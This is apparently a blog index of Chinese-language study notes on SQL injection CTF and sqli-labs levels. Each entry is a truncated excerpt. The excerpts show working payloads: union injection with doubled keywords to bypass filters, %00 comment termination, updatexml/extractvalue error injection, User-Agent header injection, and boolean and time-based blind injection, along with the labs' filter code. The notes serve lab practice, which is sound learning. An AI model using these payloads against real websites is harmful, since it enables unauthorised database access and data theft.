note-nssctf-01 [SWPUCTF 2022 新生赛]ez_sql题目说参数为nss,get传nss=1提示要用更安全的传参法,那就post了post: 12nss=1' //报错nss=1'# //成功闭合 用联合注入发现被过滤了union,空格双写绕过即可爆字段payload 1nss=' uunionnion/**/select/**/1,database(),gr 2025-03-17 #nssctf
note-14 less28测试出闭合点 1?id=1');%00 然后看一眼源码的过滤 12345678$id= preg_replace('/[\/\*]/',"", $id); //strip out /*$id= preg_replace('/[--]/',"", $id); //Strip out 2025-03-16 #sql-labs
note-13 less26a网上博客是说用%a0来代替空格,但是我这环境好像解析不了,也不能用报错注入。最后试出来能用来盲注的payload就是: 1?id=')||if(length(database())=8,1,0);%00 结果牛大b了,在后面27在同样过滤了空格的情况下用其它如%a0能正确解析,可能是我的关卡文件有问题;那不管了,直接做less27。 less27这题过滤对大小写没考虑, 2025-03-15 #sql-labs
note-12 less-25 字符过滤绕过由题目可知道过滤了or和and,大小写没用。 123456function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/AND/i 2025-03-13 #sql-labs
note-11 less-21根据题目提示先登正确账户密码吗,然后bp抓包 123456789101112131415161718GET /sqli-labs/Less-21/index.php HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: "Not(A:Brand";v="24", "Chro 2025-03-12 #sql-labs
note-10 less18 可能是叫做报头注入在有头部回显的状况下用 如图payload 1User-Agent: ' or updatexml(1,concat('!',(database())),1),2,3)# 因为源码里有检查三个参数,所以要输入三个参数,或者用 12345' or extractvalue(1,concat(0x7e,database( 2025-03-10 #sql-labs
note-09 sql-labs-less16先找一下注入点 1uname=1&passwd=1") or true#&submit=Submit 尝试报错注入,无果进行盲注改一下less14的脚本来用: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505 2025-03-09 #sql-labs
note-08 less-13只有登录成功回显,没其它信息密码传入必须有字符,闭合点 11') # 错误注入payload 1uname=1&passwd=1') or updatexml(1,concat(0x7e,(select user()),0x7e),1)#&submit=Submit 布尔盲注因为有登录成功反馈,可以使用布尔盲注 1uname=1&passw 2025-03-07 #sql-labs
note-07 sql-labs-less11以前ctf练习题反而是post模式做的多些,notice 注意原先请求的值要改为数据库不存在的值免得将后面的查询结果覆盖 hackbar下的结构 1uname=1'union select user(),database()#&passwd=&submit=Submit 之后的注入拼接进uname后 爆用户和库名: 11' 2025-03-06 #sql-labs
note-06 sql-labs-less9题目说了是单引号闭合,然后怎么尝试都返回 You are in……….. 没有登录是否成功回显,没有sql报错回显意思就是只能用时间延迟来判断注入是否正确,无法像less8能用respond长度来判断是否正确了使用 1234sleep()和ifand 来构造payload,例如: 1?id=1' and if(substr(database(),1,1 2025-03-05 #sql-labs